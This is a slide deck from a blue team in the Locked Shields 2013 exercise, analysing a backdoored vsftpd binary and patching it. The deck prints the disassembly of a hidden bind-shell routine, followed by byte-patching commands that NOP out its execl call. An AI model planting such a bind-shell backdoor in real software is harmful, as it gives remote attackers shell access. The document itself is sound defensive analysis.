Recommended
More Related Content
Viewers also liked
Viewers also liked (15)
Similar to BlueTeam-RedTeam Exercise - Backdoor containment
Similar to BlueTeam-RedTeam Exercise - Backdoor containment (20)
Recently uploaded
Recently uploaded (20)
BlueTeam-RedTeam Exercise - Backdoor containment
- 1. Locked Shields 2013, Cyber Defence Exercise Exercise Overview Locked Shields (CDx) is a real-time red-team/blue-team exercise organised by NATO Cooperative Cyber Defence Centre of Excellence together with its partners. The CDx has a game-based approach which means that no organisation will play their real-life role and the scenario is fictional. Finmeccanica, a large italian defence supplier, was engaged by defence forces to take part and support italian army blueteam1 during the cdx13 exercise. Report Date: Author: Giacomo – Jack -‐ Milani (Finmeccanica/Cyberlabs Team) Asset Overview Host tv.milX.ex is a Linux server used in the exercise to stream video news . The exercise constraint is that blueteams can’t upgrade or change any services in that network. VSFTPD backdoor containment - cdx13 Hostname: tv.mil1.ex Path: /usr/sbin/vsftpd Vulnerability Analysis The vsftpd binary has a backdoor in the following code, that executes a classical bindshell ( bind,listen,accept,dup2 std stream, execve ): 805d809: 89 44 24 04 mov %eax,0x4(%esp) 805d80d: 89 34 24 mov %esi,(%esp) 805d810: e8 4b c2 fe ff call 8049a60 <bind@plt> 805d815: 85 c0 test %eax,%eax 805d817: 0f 88 aa 00 00 00 js 805d8c7 <capset+0x777> 805d81d: c7 44 24 04 64 00 00 movl $0x64,0x4(%esp) 805d824: 00
- 2. 805d825: 89 34 24 mov %esi,(%esp) 805d828: e8 93 c3 fe ff call 8049bc0 <listen@plt> 805d82d: 83 c0 01 add $0x1,%eax 805d830: 0f 84 91 00 00 00 je 805d8c7 <capset+0x777> 805d836: 66 90 xchg %ax,%ax 805d838: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 805d83f: 00 805d840: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 805d847: 00 805d848: 89 34 24 mov %esi,(%esp) 805d84b: e8 00 c0 fe ff call 8049850 <accept@plt> 805d850: c7 04 24 00 00 00 00 movl $0x0,(%esp) 805d857: 89 c3 mov %eax,%ebx 805d859: e8 12 c5 fe ff call 8049d70 <close@plt> 805d85e: c7 04 24 01 00 00 00 movl $0x1,(%esp) 805d865: e8 06 c5 fe ff call 8049d70 <close@plt> 805d86a: c7 04 24 02 00 00 00 movl $0x2,(%esp) 805d871: e8 fa c4 fe ff call 8049d70 <close@plt> 805d876: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 805d87d: 00 805d87e: 89 1c 24 mov %ebx,(%esp) 805d881: e8 4a bd fe ff call 80495d0 <dup2@plt> 805d886: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 805d88d: 00 805d88e: 89 1c 24 mov %ebx,(%esp) 805d891: e8 3a bd fe ff call 80495d0 <dup2@plt> 805d896: c7 44 24 04 02 00 00 movl $0x2,0x4(%esp) 805d89d: 00 805d89e: 89 1c 24 mov %ebx,(%esp) 805d8a1: e8 2a bd fe ff call 80495d0 <dup2@plt> 805d8a6: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 805d8ad: 00 805d8ae: c7 44 24 04 d6 15 06 movl $0x80615d6,0x4(%esp) 805d8b5: 08 805d8b6: c7 04 24 d1 15 06 08 movl $0x80615d1,(%esp) 805d8bd: e8 4e c2 fe ff call 8049b10 <execl@plt> 805d8c2: e9 71 ff ff ff jmp 805d838 <capset+0x6e8> 805d8c7: c7 04 24 01 00 00 00 movl $0x1,(%esp) 805d8ce: e8 3d c0 fe ff call 8049910 <exit@plt> 805d8d3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 805d8d9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 805d8e0: 83 ec 1c sub $0x1c,%esp 805d8e3: 8b 44 24 20 mov 0x20(%esp),%eax 805d8e7: c7 04 24 5c 91 06 08 movl $0x806915c,(%esp) 805d8ee: 89 44 24 04 mov %eax,0x4(%esp) 805d8f2: e8 c9 4d ff ff call 80526c0 <fchmod@plt+0x8900> 805d8f7: 83 c4 1c add $0x1c,%esp 805d8fa: c3 ret 805d8fb: 90 nop
- 3. Vulnerability Containment Containment code will block the vulnerability rewriting the execl call with NOP (0x90) (null operator opcodes) 000158b0 24 04 d6 15 06 08 c7 04 24 d1 15 06 08 e8 4e c2 |$.......$.....N.| 000158c0 fe ff e9 71 ff ff ff c7 04 24 01 00 00 00 e8 3d |...q.....$.....=| in 000158b0 24 04 d6 15 06 08 c7 04 24 d1 15 06 08 90 90 90 |$.......$.....N.| 000158c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |...q.....$.....=| 158b0 hex is 88240 dec blueteam1 has edited the binary to contain the impact of the backdoor: echo -‐ne "x24x04xd6x15x06x08xc7x04x24xd1x15x06x08x90x90x90x90x90x90x90x90x 90x90x90x90x90x90x90x90x90x90x90x90x90x90" > /tmp/vsftpd.containment cp /usr/sbin/vsftpd /tmp/vsftpd.tmp cp /usr/sbin/vsftpd /usr/sbin/vsftpd.backup dd if=/tmp/vsftpd.containment of=/tmp/vsftpd.tmp bs=1 seek=88240 conv=notrunc /etc/init.d/vsftpd stop cp /tmp/vsftpd.tmp /usr/sbin/vsftpd /etc/init.d/vsftpd start
- 4. Patched function 805d8a1: e8 2a bd fe ff call 80495d0 <dup2@plt> 805d8a6: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 805d8ad: 00 805d8ae: c7 44 24 04 d6 15 06 movl $0x80615d6,0x4(%esp) 805d8b5: 08 805d8b6: c7 04 24 d1 15 06 08 movl $0x80615d1,(%esp) 805d8bd: 90 nop 805d8be: 90 nop 805d8bf: 90 nop 805d8c0: 90 nop 805d8c1: 90 nop 805d8c2: 90 nop 805d8c3: 90 nop 805d8c4: 90 nop 805d8c5: 90 nop 805d8c6: 90 nop 805d8c7: 90 nop 805d8c8: 90 nop 805d8c9: 90 nop 805d8ca: 90 nop 805d8cb: 90 nop 805d8cc: 90 nop 805d8cd: 90 nop 805d8ce: 90 nop 805d8cf: 90 nop 805d8d0: 90 nop 805d8d1: 90 nop 805d8d2: 90 nop 805d8d3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 805d8d9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 805d8e0: 83 ec 1c sub $0x1c,%esp 805d8e3: 8b 44 24 20 mov 0x20(%esp),%eax 805d8e7: c7 04 24 5c 91 06 08 movl $0x806915c,(%esp) 805d8ee: 89 44 24 04 mov %eax,0x4(%esp) 805d8f2: e8 c9 4d ff ff call 80526c0 <fchmod@plt+0x8900> 805d8f7: 83 c4 1c add $0x1c,%esp 805d8fa: c3 ret